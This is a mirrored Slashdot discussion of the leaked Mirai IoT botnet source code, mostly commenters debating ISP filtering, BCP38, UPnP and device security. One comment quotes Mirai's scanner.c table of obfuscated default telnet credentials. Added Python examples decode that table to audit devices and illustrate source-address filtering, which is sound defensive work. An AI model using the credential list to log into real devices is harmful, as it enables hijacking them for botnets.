Slashdot Mirror


Krebs Warns Source Code Leaked From Massive IoT Botnet Attack (krebsonsecurity.com)

Remember that historically massive denial-of-service attack last month against security researcher Brian Krebs? The source code's just been leaked, Krebs reports, "virtually guaranteeing that the Internet will soon be flooded with attacks from many new botnets powered by insecure routers, IP cameras, digital video recorders and other easily hackable devices." An anonymous Slashdot reader quotes KrebsOnSecurity: The malware, dubbed "Mirai," spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords. Infected systems can be cleaned up by simply rebooting them -- thus wiping the malicious code from memory. But experts say there is so much constant scanning going on for vulnerable systems that vulnerable IoT devices can be re-infected within minutes of a reboot. Only changing the default password protects them from rapidly being reinfected on reboot...

The user who leaked the source code says "there's lots of eyes looking at IOT now... I usually pull max 380K bots from telnet alone. However, after the Krebs DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300K bots, and dropping"...

Now that the source code has been released online for that 620-Gbps attack, Krebs predicts "there will soon be many Internet users complaining to their ISPs about slow Internet speeds as a result of hacked IoT devices on their network hogging all the bandwidth. On the bright side, if that happens it may help to lessen the number of vulnerable systems." He points out that 5.5 million new things get connected to the internet each day, according to Gartner. And they're also predicting that 6.4 billion things will be connected to the internet by the end of the year -- reaching 20.8 billion over the next four years.

69 comments

  1. Throw away economics? by Anonymous Coward · · Score: 1

    The throw-away hardware market gave way to the throw-away software (APPS!) market... is this the result?

    1. Re:Throw away economics? by Opportunist · · Score: 2

      This is more a result of people wanting the latest gadget with the most gimmicks, ignoring security or whether they actually need those gimmicks. This of course leads to manufacturers stuffing more and more gimmicks into their toys, and with the rule that the first to the market makes the buck, security is simply ignored, since the customer does not give a shit about it.

      It's simply market economics at work.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re: Throw away economics? by Anonymous Coward · · Score: 1

      As modern app appers know....

    3. Re:Throw away economics? by AmiMoJo · · Score: 1

      When people buy tech like this they buy the cheapest option. Why pay more for the same functionality? Security is a secondary consideration.

      I like the idea of ISPs scanning for these vulnerabilities and auto-blocking accounts that become infected until the owner contacts them.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    4. Re:Throw away economics? by Opportunist · · Score: 1

      What I don't like about this option is what will immediately follow: "If you can scan for bots, you can scan for torrents".

      In the end, we'll get something like that. And this is why we can't have nice things.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    5. Re:Throw away economics? by RockDoctor · · Score: 1

      When people buy tech like this they buy the cheapest option. Why pay more for the same functionality? Security is a secondary consideration.

      "Security" rates as highly as that? What an optimist you are.

      --
      Birds are not dinosaur descendants;birds are dinosaurs, for all useful meanings of "birds", "are" and "dinosaurs"
  2. Overly optimistic by TroII · · Score: 4, Funny

    Krebs predicts "there will soon be many Internet users complaining to their ISPs about slow Internet speeds as a result of hacked IoT devices on their network hogging all the bandwidth. On the bright side, if that happens it may help to lessen the number of vulnerable systems."

    Yeah, I doubt it.

    Customer: My internet is slow.
    Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
    Customer: Yes, my internet is still slow.
    Comcast: Let me to be sending the signal to your modem!
    Customer: Didn't do anything, my internet is still slow.
    Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
    Customer: Yes, 5 minutes ago while I was talking to you! My internet is still slow.
    Comcast: Let me to be sending the signal to your modem!

    1. Re: Overly optimistic by Anonymous Coward · · Score: 0

      Thanks you to be calling Helpdesk. My name is... Fred.

    2. Re:Overly optimistic by Anonymous Coward · · Score: 0

      You failed to upsell. Strike one.

    3. Re:Overly optimistic by Anonymous Coward · · Score: 3, Informative

      Used to work for 2Wire many years ago. Took transfers from outsourced SBC L1 techs. Unlike most, I don't blame them for being insanely inept at their jobs. They're hired to follow a script, not be technicians. Probing for info before the transfer often went like this:

      Me: "Did you try pinging the router?"
      L1: "...I was not able to do that."
      Me: "Ok, is there something wrong? How come you were unable to ping it?"
      L1: "...I was not able to do that."

      I get similar from my cable ISP from non-outsourced support if I call during the day. At night, I assume they have to staff the competent people as there are no others around to fix things. I can say "my modem doesn't sync" without being asked to reboot my computer.

      Sorry, off topic. AC anyhow so unlikely to be seen. :)

    4. Re:Overly optimistic by Anonymous Coward · · Score: 0

      One benefit of night during prime hours is that you do get better support. Daytime is usually script followers and lower paying positions. Prime time and slightly later are college students or the like and the better paying positions. The reason is that people are more likely to complain on social media during primetime if they miss their favorite show or the actual person who pays the bills is more likely to complain during the later hour than in the middle of the day.

    5. Re:Overly optimistic by Anonymous Coward · · Score: 0

      LOL have you seen @comcastcares on Twitter?

    6. Re:Overly optimistic by Anonymous Coward · · Score: 0

      I see you have spoken with my phone company

    7. Re:Overly optimistic by Anonymous Coward · · Score: 0

      Krebs predicts "there will soon be many Internet users complaining to their ISPs about slow Internet speeds as a result of hacked IoT devices on their network hogging all the bandwidth. On the bright side, if that happens it may help to lessen the number of vulnerable systems."

      Yeah, I doubt it.

      Customer: My internet is slow.
      Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
      Customer: Yes, my internet is still slow.
      Comcast: Let me to be sending the signal to your modem!
      Customer: Didn't do anything, my internet is still slow.
      Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
      Customer: Yes, 5 minutes ago while I was talking to you! My internet is still slow.
      Comcast: Let me to be sending the signal to your modem!

      You have your own internet?

      I hate this sloppy use of English - you have a fucking internet connection not your own fucking internet!

  3. DDoS by ledow · · Score: 2

    No problem.

    My old ISP used to detect SMB port access. If they witnessed any - i.e. your connection was opening your file shares to the world - they would block your web and replace every page with a notice until you signed a document stating that you intended to do this. I think you needed a customer number so not something that the kids could just press okay on for you.

    At that point, they would open up the port again, or - if you'd fixed the problem and they detected that - they'd check once an hour and take the block off.

    Force ISPs to do the same for when they detect spam email, or botnet-contribution, etc. Then when they detect it again after they'd signed, you can just kick them off for AUP violation.

    But easier - just charge people by the byte. That's what'll end up happening. And most people won't even know or care that they're sending gigabytes to some poor sod's website.

    1. Re:DDoS by Anonymous Coward · · Score: 0

      will you marry me?

    2. Re:DDoS by Anonymous Coward · · Score: 0

      But easier - just charge people by the byte. That's what'll end up happening. And most people won't even know or care that they're sending gigabytes to some poor sod's website.

      At least until the poor sod realizes there are people they can sue, and that they have a slam dunk case.

    3. Re: DDoS by Anonymous Coward · · Score: 0

      Is discriminating against botnet traffic within the net neutrality guidelines?

    4. Re:DDoS by Doke · · Score: 1

      The problem is from amplification attacks. A sends a dns query (or something) packet to B, but forges a source address of C. B sends a much larger response to C. C blames B. B's internet fee goes up. Both B and C are victims. The correct solution is BCP38, "http://www.bcp38.info/index.php/Main_Page". Unfortunately, a lot of (IMO shady) network operators don't implement restrictions on their clients forging source ip addresses. They might be accepting payment to allow this abuse, they might be incompetent, or they might just be lazy. The excuse that it cost too much to upgrade their gear is no longer relevant. All routers have had the cpu to do that for years.

    5. Re: DDoS by Anonymous Coward · · Score: 0

      of course not

    6. Re:DDoS by Anonymous Coward · · Score: 0

      From what I've read this attack did not utilize DNS reflection. This was sheer brute-force.

    7. Re:DDoS by davecb · · Score: 1

      In various countries, ISPs are reluctant to block spam from their customers, or even tell the customers that they have a virus, for fear the customer will sue them. In Canada (right next to the US) we were advised to do nothing, as one litigious customer could ruin your whole year (;-))

      --
      davecb@spamcop.net
  4. Three Pronged Attack by Anonymous Coward · · Score: 0

    1) Fines for device manufacturers whose products participate in these attacks
    2) Fines for ISPs that allow this traffic
    3) Fines for the end users who are too inept to police their equipment

    And not little fines.

    1. Re:Three Pronged Attack by jabuzz · · Score: 1

      I would just go for 1 and for the really bad things like backdoor accounts, fixed known default passwords etc. Then make the fines repeat at double the rate every say three months if they don't fix it.

      At least that way one should in the future be able to buy from big name vendors and have a hope that they are reasonably secure.

    2. Re:Three Pronged Attack by Doke · · Score: 1

      Unfortunately, by the time the FTC or FCC got the fine through appeals, the bad device would have been on the market for 10 years. By then the sub-company created to market that device would no longer exist. It also would not eliminate the bad devices already out there.

    3. Re:Three Pronged Attack by Archangel+Michael · · Score: 1

      1) Defeated by bankruptcy
      2) Defeated by lobbying
      3) Blood from turnips. Good luck with that.

      Good luck with that. The problem is, these types of events are easily solvable, except the part where solving it requires cooperation. The whole "That's Not My Problem" response by just about everyone. The problem is, it is everyone's problem because just about everyone contributes to it. There is almost one IoT device for every person on earth already.

      The biggest problem with IoT devices is that they are mostly replacing devices that are infrastructure (long lasting) devices that don't have to be updated, upgraded or patched, so nobody is thinking about the long term consequences of having to replace that thermostat every 3 years because it has expired support. I suspect that once you include the regular cost of replacing said device every couple years, the novelty of having a "smart thermostat" will wear off and the smart people will go back to regular unplugged thermostat, because the inconvenience of long term support isn't worth the convenience of having your heating and cooling by remote control.

      The smart apps on my TV are useless.
      Your thermostat has been hacked.
      IMHO the IoT is a bust already, and it hasn't even got off the ground yet.

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
  5. Blame by Anonymous Coward · · Score: 0

    I blame Russians, nuclear power, trans fats, and gluten.

  6. It's not "cleaning up", it's competition by Opportunist · · Score: 3, Interesting

    The reason you can't simply get as many bots isn't that ISPs start finding out that they have a responsibility. It's simply that more players are fighting over the bots.

    Next step is probably botters hacking devices and changing the passwords so other bot herders can't use them. It's the usual game: A resource is only valuable if the other one does NOT have it.

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  7. Good! by dromgodis · · Score: 2

    Am I thinking wrong, or isn't this potentially a good thing? The more DOS:ers fighting for the same bots, the fewer of them will be able to hit each site. Thus they won't really be effective any longer.

    1. Re: Good! by Anonymous Coward · · Score: 0

      I'm sure they'll work out some kind of time share scheme.

    2. Re:Good! by arglebargle_xiv · · Score: 1

      It's more of a nothing thing at the moment, this freely-available source code doesn't seem to be available anywhere. I was curious to see what the code was like, but it's not available anywhere I can see...

  8. see what happens when you... by Anonymous Coward · · Score: 0
    1. Re:see what happens when you... by Anonymous Coward · · Score: 0

      I see from your post what happens when you go full retard.

  9. "Mirai" by SeaFox · · Score: 2

    Krebs reports, "virtually guaranteeing that the Internet will soon be flooded with attacks from many new botnets powered by insecure routers, IP cameras, digital video recorders and other easily hackable devices."

    A frightening "future" indeed.

    1. Re:"Mirai" by jargonburn · · Score: 1

      Ha, nice! I wasn't actually thinking about what the name meant.

  10. Have the actual IoT devices been identified? by slincolne · · Score: 3, Interesting
    Has anyone seen any lists of the devices that are being compromised?

    It would be really handy to know what devices are actually at risk, so that people can tell if they need to take action. It sounds like whatever these devices are, they have somehow been exposed to the Internet (didn't we all disable UPNP years ago).

    Maybe all the ISPs should grab a copy of the code and use it for scanning for vulnerable client devices and tell their customers to disconnect them before the ISP does it for them.

    1. Re:Have the actual IoT devices been identified? by gbjbaanb · · Score: 2

      probably all of them, sooner or later. The IoT software built into nearly everything will be done as a marketing gimmick more than anything, with both cost and ease-of-usage kept down as low as possible meaning security will be non-existent, or if it is present will be so dumbed down to make it work out-of-the-box without any configuration.

    2. Re:Have the actual IoT devices been identified? by Fnord666 · · Score: 1

      It would be really handy to know what devices are actually at risk, so that people can tell if they need to take action. It sounds like whatever these devices are, they have somehow been exposed to the Internet (didn't we all disable UPNP years ago).

      I haven't seen the source code yet, but here is an interesting article that discusses at least some of the participants.

      --
      'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
  11. Appernet of Apps! by Anonymous Coward · · Score: 0

    ONLY apps can app apps, and with the Appernet of Apps, modern can app even more apps while apping other apps! With LUDDITE software like LUDDITE Windows 7, you can only run one LUDDITE program at a time!

    Apps!

  12. Auto-Disconnect by ISPs? by BoRegardless · · Score: 1

    When is the whole www going to implement a system to disconnect items on the last leg of an internet connection when misbehavior occurs?

    If 100 users get disconnected and 99 all pounce on the guy responsible for having a Bot-IOT device.

    At least I can dream.

    1. Re:Auto-Disconnect by ISPs? by Anonymous Coward · · Score: 0

      But it's so HAAAAARRRRD. And ignoring the problem and waving our hands and blaming it on nation state gremlins is so EEAAAASSSSYYYYY.

      And what you should really be saying is - "If one subscriber's 100 devices get disconnected, then the lack of utility of the 99 still working ones will motivate the lazy cheapskate to get off their ass and press the off button on the defective device. And if ten thousand lazy cheapskates all face this situation, two or three will make some noise and shame the defective device manufacturer into taking the most trivial steps (step#1, here is the source code customer, fix it yourself, you'll be fucking amazed at how possible this is with countless global tech forums available to you) to fix the known defective and harmful to the network device.

    2. Re:Auto-Disconnect by ISPs? by Zontar+The+Mindless · · Score: 2

      What's "misbehaviour"?

      --
      Il n'y a pas de Planet B.
  13. torrent? by Anonymous Coward · · Score: 0

    Well? Where is the source, luke?

  14. time to brick them? by Gravis+Zero · · Score: 3, Interesting

    So is it time for people to start bricking every unsecured IoT device or what?

    --
    Anons need not reply. Questions end with a question mark.
    1. Re:time to brick them? by BoRegardless · · Score: 1

      VERY Interesting: If an automated BOT went around and commandeered unsecured IOT devices and simply destroyed them, that would solve one problem. People would quickly learn to secure their IOT devices.

    2. Re:time to brick them? by dargaud · · Score: 1

      I think most IOT is hard to brick: if you reboot it it just restarts in default mode as there's no writable filesystem (only a ramdisk) and only a few bytes where to save config information. So you are back to square one with a device still ripe open and ready for the ownage.

      --
      Non-Linux Penguins ?
    3. Re:time to brick them? by Doke · · Score: 1

      Then get sued... :-(

    4. Re: time to brick them? by Anonymous Coward · · Score: 0

      Nvram can easily be fucked.

  15. BCP38 by mars-nl · · Score: 3, Interesting

    Wouldn't most if not all DDoS attacks be much harder if ISPs implemented BCP38? Of course IoT devices should be secure, but this is a dream as software will always contain bugs. The number of ISPs is much smaller than the number of devices connected to the internet, so blocking spoofed IP traffic is a much cheaper solution.

    1. Re:BCP38 by ShaunC · · Score: 2

      Some of the traditional attacks (DNS/NTP reflection and amplification) would be mitigated but it's not likely to help with these IoT DDoSes. When you can control 300,000 pwned devices, you don't need to spoof any traffic.

      --
      Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
    2. Re:BCP38 by I4ko · · Score: 1

      In my case I have a set of rules on my router - you send me a packet I don't expect - blacklisted for 1 hour.
      You send me another packet - add another hour to your blacklist time. I have a few IP cameras - they are allowed to connect only to my internal DNS and to my external ftp server. All connections to them, and outbound from them to places I have not explicitly allowed are dropped silently.
      Same for NAS-es as well - no, you can't use UPNP, you can't phone home to mama(facturer), and you most certainly can't get any connection from the outside world. The WD devices are horrible and next to be hacked - they open an openvpn connection and drop untrusted traffic right in your network.. clickety click - no more traffic.

    3. Re:BCP38 by Anonymous Coward · · Score: 0

      Thanks, I will forward this information to my Grandma.

    4. Re:BCP38 by Anonymous Coward · · Score: 0

      Here's an idea - how about not thinking that every single freakin' device needs to be "internet enabled"! Seriously, it is marketing hype and people need to stop falling for it. You do *not* need your thermostat to be internet enabled. You do *not* need your car to be internet enabled. It is all pointless over-engineering meant to drive up price points and try to get people to buy things that they do not need. Furthermore, this pointless over engineering *decreases* reliability and the same time that it is pointlessly increasing cost. Stop being such drones and things would be so much better.

    5. Re:BCP38 by Doke · · Score: 1

      Regrettably, this is true. Krebs said his Akamai protection got hit primarily by GRE packets straight from the botted device. Very little of the DDOS was from amplification.
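
An added illustration, not part of any comment in this thread, of the BCP38 source-address check that Doke and mars-nl refer to. The port names, prefixes and packets are constructed assumptions; the run shows the point made in the replies, that the check drops the forged packet behind an amplification attack but forwards a flood sent from a botted device's real address.

```python
import ipaddress

# Constructed data: prefixes an ISP has assigned to each customer-facing port.
ASSIGNED = {
    "cust-A": ["198.51.100.0/29"],
    "cust-D": ["203.0.113.64/28", "2001:db8:42::/48"],
}
NETS = {port: [ipaddress.ip_network(p) for p in prefixes]
        for port, prefixes in ASSIGNED.items()}


def source_is_valid(port, src):
    """BCP38-style check: accept a packet only if its source address lies
    inside a prefix assigned to the port it arrived on."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # malformed source address
    # Membership is False when the address and network versions differ.
    return any(addr in net for net in NETS.get(port, []))


# Constructed packets: (ingress port, source, destination, description).
PACKETS = [
    ("cust-A", "192.0.2.10", "198.51.100.53", "DNS query, source forged as victim C"),
    ("cust-A", "198.51.100.3", "198.51.100.53", "DNS query, real source"),
    ("cust-D", "203.0.113.70", "192.0.2.10", "flood from botted camera, real source"),
    ("cust-D", "2001:db8:99::1", "2001:db8:ffff::1", "IPv6 packet, source outside assigned /48"),
    ("cust-X", "203.0.113.70", "192.0.2.10", "packet on a port with no assigned prefix"),
]


def filter_edge(packets):
    """Return (verdict, description) for each packet at the ISP edge."""
    return [("forward" if source_is_valid(port, src) else "drop", desc)
            for port, src, _dst, desc in packets]


if __name__ == "__main__":
    for verdict, desc in filter_edge(PACKETS):
        print(f"{verdict:8} {desc}")
```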

  16. You don't want this. by waspleg · · Score: 1

    Slippery slope. Very slippery. Oh look the ??AA just lobbied to get torrents listed as malware traffic legally and now ISPs are required to go around policing which is what the shit lord copyright trolls have always wanted.

  17. He got Slashdotted ! by Laxator2 · · Score: 1

    In the past this used to be a good thing indeed,
    but by now everyone seems to have forgotten the Slashdot Effect:

    https://en.wikipedia.org/wiki/...

    I am getting old ...

  18. Which Devices? by Anonymous Coward · · Score: 0

    I don't see it as very helpful to announce these malwares and then issue hand waving generalities about 300,000 infected devices without ever mentioning which devices are being infected.

    I realize that he explains that it is devices such as video cameras with default credentials, but I very much doubt that it is all that large a group of manufacturers/products. My suspicion is that, despite it being a very large number of devices(bots), it is a small group of manufacturers/products, and knowing which ones would be very helpful.

    So, who/what makes up the botnet? Is it Hikvision, Panasonic, Ubiquiti? This, to me is the more important detail.

    1. Re:Which Devices? by Doke · · Score: 1

      I've heard that mentioning specific vendors and models can get a security researcher sued. These days, you need to either post the list of weak devices anonymously, or consult a lawyer about responsible disclosure.

  19. NAT? by Anonymous Coward · · Score: 0

    Does this scanning for IoT devices bypass NAT somehow? If my router isn't hacked, my internal devices should be safe from scanning?

  20. How to protect myself? by ripvlan · · Score: 2

    I've been trying to get more info on this IoT unsecure thing and understand what these devices are. One thing that confuses me is that - aren't these things installed (mostly) in Residential Homes? which would be behind a "firewall" router that (usually) uses NAT?

    The reason I ask this - how do I protect myself if I place such a device in my home? Are these pwned devices on the open network --- or can they be attacked through NAT? My "smart" TV, Bluray, Amazon TV, Apple TV, Raspberry Pi, Sonos, etc are all on the network. I have a NAT w/ uPNP disabled (prevent holes from being poked). Sure I understand there are ways through NAT....but these IoT attacks seem to "telnet" directly to the device without any special layers.

    Beyond basic NAT/uPNP --- what else do I need to know?

    Thanks!

    1. Re: How to protect myself? by mbeckman · · Score: 2

      uPNP is the culprit in most cases. It lets IOT devices unilaterally open holes in firewalls. The thing is, there is no reason to do so, as IoT devices should only need to "phone home", which doesn't require inbound access. The second vector is viruses that invade a home user's desktop computer, and then scan for, and infect, IoT devices. This is much harder to protect against, as ISPs can't scan through the firewall. What would be helpful is a downloadable tool to let users run their own IoT vulnerability assessment. I notice that commercial tools, such as Nessus, still haven't woken up to this threat.

    2. Re:How to protect myself? by Anonymous Coward · · Score: 0

      Holes can be punched in the NAT (NAT-PMP, STUN, etc), but device has to do it itself. I think what these guys do, they scan for open port 23, and 2323 and maybe even 23023? or maybe have a script in some ad rotation network, that connects FROM your browser TO your gateway at port 23, and accesses it from there with some default passwords? Javascript is evil =)

    3. Re:How to protect myself? by Anonymous Coward · · Score: 0

      Changing default passwords is one huge thing most people don't do.

    4. Re:How to protect myself? by Doke · · Score: 1

      Most consumer grade gateways are designed for less technical users. To reduce support calls, they have UPNP turned on by default. These days, they usually have an option to turn it off, probably down in an "advanced" page of the WUI. However, they very seldom have options to limit it to specific internal devices. Many of the online games require open network ports, and use UPNP to obtain them. Technical users can manually set up the port forwarding for a game console, by assigning it a fixed ip, and passing the required ports. However, the majority of users can't do that, or are too lazy. The few users who turn UPNP off, often end up turning it back on to get the games to work correctly. At that point, all of the IoT devices can create their telnet backdoor UPNP exceptions too.

      Another method is a downloaded trojan on a PC, that infects IoT things on the local network.

  21. Re:What I'd like to see by Archangel+Michael · · Score: 1

    You'd be dead too. ;)

    --
    Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
  22. I've Heard by Anonymous Coward · · Score: 0

    I've heard that you're a raging homosexual. But, that doesn't mean that it's true.

    Printing facts, such as, the malware targets devices made by Hikuiti gets no one sued. It would be an irrefutable statement of fact.

  23. From scanner.c by Anonymous Coward · · Score: 0

    Scanner runs through the following list of default login/passwords.

    // Set up passwords
    add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
    add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
    add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
    add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
    add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
    add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
    add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
    add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
    add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
    add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
    add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
    add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
    add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
    add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none)
    add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3);
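
An added example, not part of the comment above or of the leaked code: it recovers the single-byte XOR key from the one pair the listing itself gives ("\x50\x4D\x4D\x56" commented as "root"), decodes the table, and audits a device inventory against it. The inventory entries and the severity labels are constructed assumptions.

```python
# (user, password) byte strings as they appear in the scanner.c listing above.
OBFUSCATED = [
    (b"\x50\x4D\x4D\x56", b"\x5A\x41\x11\x17\x13\x13"),
    (b"\x50\x4D\x4D\x56", b"\x54\x4B\x58\x5A\x54"),
    (b"\x50\x4D\x4D\x56", b"\x43\x46\x4F\x4B\x4C"),
    (b"\x43\x46\x4F\x4B\x4C", b"\x43\x46\x4F\x4B\x4C"),
    (b"\x50\x4D\x4D\x56", b"\x1A\x1A\x1A\x1A\x1A\x1A"),
    (b"\x50\x4D\x4D\x56", b"\x5A\x4F\x4A\x46\x4B\x52\x41"),
    (b"\x50\x4D\x4D\x56", b"\x46\x47\x44\x43\x57\x4E\x56"),
    (b"\x50\x4D\x4D\x56", b"\x48\x57\x43\x4C\x56\x47\x41\x4A"),
    (b"\x50\x4D\x4D\x56", b"\x13\x10\x11\x16\x17\x14"),
    (b"\x50\x4D\x4D\x56", b"\x17\x16\x11\x10\x13"),
    (b"\x51\x57\x52\x52\x4D\x50\x56", b"\x51\x57\x52\x52\x4D\x50\x56"),
    (b"\x50\x4D\x4D\x56", b""),
    (b"\x43\x46\x4F\x4B\x4C", b"\x52\x43\x51\x51\x55\x4D\x50\x46"),
    (b"\x50\x4D\x4D\x56", b"\x50\x4D\x4D\x56"),
    (b"\x50\x4D\x4D\x56", b"\x13\x10\x11\x16\x17"),
    (b"\x57\x51\x47\x50", b"\x57\x51\x47\x50"),
    (b"\x43\x46\x4F\x4B\x4C", b""),
    (b"\x50\x4D\x4D\x56", b"\x52\x43\x51\x51"),
    (b"\x43\x46\x4F\x4B\x4C", b"\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16"),
]


def derive_key(obfuscated: bytes, plaintext: str) -> int:
    """Recover a single-byte XOR key from one known ciphertext/plaintext pair."""
    plain = plaintext.encode("ascii")
    keys = {o ^ p for o, p in zip(obfuscated, plain)}
    if len(obfuscated) != len(plain) or len(keys) != 1:
        raise ValueError("not a single-byte XOR of the given plaintext")
    return keys.pop()


def deobfuscate(blob: bytes, key: int) -> str:
    return bytes(b ^ key for b in blob).decode("ascii")


KEY = derive_key(OBFUSCATED[0][0], "root")  # pair taken from the listing's comment
DEFAULTS = {(deobfuscate(u, KEY), deobfuscate(p, KEY)) for u, p in OBFUSCATED}

# Constructed inventory, e.g. exported from a device-management spreadsheet.
INVENTORY = [
    {"device": "dvr-garage", "user": "root", "password": "xc3511", "telnet_open": True},
    {"device": "cam-porch", "user": "admin", "password": "", "telnet_open": False},
    {"device": "nas-office", "user": "admin", "password": "T7#kq-long-unique", "telnet_open": False},
    {"device": "cam-yard", "user": "admin", "password": "changed-2016!", "telnet_open": True},
]


def audit(inventory, defaults=DEFAULTS):
    """Map each device to a finding; labels are this example's own scale."""
    findings = {}
    for dev in inventory:
        listed = (dev["user"], dev["password"]) in defaults
        if listed and dev["telnet_open"]:
            findings[dev["device"]] = "critical: listed credential, telnet reachable"
        elif listed:
            findings[dev["device"]] = "high: listed credential"
        elif dev["telnet_open"]:
            findings[dev["device"]] = "medium: telnet reachable"
        else:
            findings[dev["device"]] = "ok"
    return findings


if __name__ == "__main__":
    for name, finding in audit(INVENTORY).items():
        print(f"{name:12} {finding}")
```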

  24. Easy to solve by Anonymous Coward · · Score: 0

    Arm the providers with detection software and they can block the ip. Provider stores the blocked ip to a customer and informs them of the vulnerability and the cause, potentially even walks them through the fix. Everyone wins!